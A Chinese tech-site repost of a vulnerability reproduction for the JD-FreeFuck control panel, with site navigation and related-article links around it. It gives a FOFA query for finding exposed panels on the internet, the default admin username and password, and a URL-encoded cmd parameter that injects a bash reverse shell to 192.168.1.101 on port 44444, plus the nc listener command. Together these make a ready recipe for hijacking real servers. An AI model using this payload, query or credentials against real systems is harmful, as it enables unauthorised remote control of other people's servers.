当前位置: 七九推 > 网络运营>服务器>Linux > JD-FreeFuck 后台命令执行漏洞

JD-FreeFuck 后台命令执行漏洞

2022年06月23日 Linux 我要评论
JD-FreeFuck 后台命令执行漏洞 漏洞说明 JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,

JD-FreeFuck 后台命令执行漏洞

漏洞说明

JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器

项目地址:https://github.com/meselson/JD-FreeFuck

环境搭建

脚本一键部署:

bash <(curl -sSL https://gitee.com/mjf521/JD-FreeFuck/raw/main/install.sh)

漏洞复现

FOFA搜索

title="京东薅羊毛控制面板"

访问后登录页面

image-20210413180417572

默认用户名密码:

useradmin
supermanito

image-20210413180601261

手动执行脚本---切换换行抓包

![屏幕截图 2021-04-14 100803](https://tomyyyyy.oss-cn-hangzhou.aliyuncs.com/img/屏幕截图 2021-04-14 100803.jpg)

然后发送包:

Snipaste_2021-04-14_10-17-58

反弹shell

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2F192.168.1.101%2F44444+%3C%261'%3B+now

监听端:

nc -lvvp 44444
(0)
打赏 微信扫一扫 微信扫一扫

相关文章:

  • 上传文件的几种主要方法。

    上传文件的几种主要方法。

    上传文件的几种主要方法。 第一种:经典的form和input上传。 设置form的aciton为后端页面,enctype=“... [阅读全文]
  • VSCode下载速度特别慢怎么解决?

    VSCode下载速度特别慢怎么解决?

    今天在公司的电脑上重装vscode的时候遇到一个问题,就是下载vscode的时候特别慢。不知道小伙伴们有没有遇到过这种问题。 VSCode下载地址... [阅读全文]
  • 抽象工厂模式(通俗易懂)

    抽象工厂模式(通俗易懂)

    抽象工厂模式(Abstract Factory Pattern)是围绕一个超级工厂创建其他工厂。该超级工厂又称为其他工厂的工厂。这种... [阅读全文]
  • 20个linux常用命令

    20个linux常用命令

    玩过Linux的人都会知道,Linux中的命令的确是非常多,但是玩过Linux的人也从来不会因为Linux的命令如此之多而烦恼&#x... [阅读全文]
  • linux多线程

    linux多线程

    多线程概念: 进程是系统中程序执行和资源分配的基本单位。每个进程有自己的数据段、代码段和堆栈段。这就造成进程在进行切换等操作时都需要有比较负责的上... [阅读全文]

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
Copyright © 2017-2022  七九推 保留所有权利. 粤ICP备17035492号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com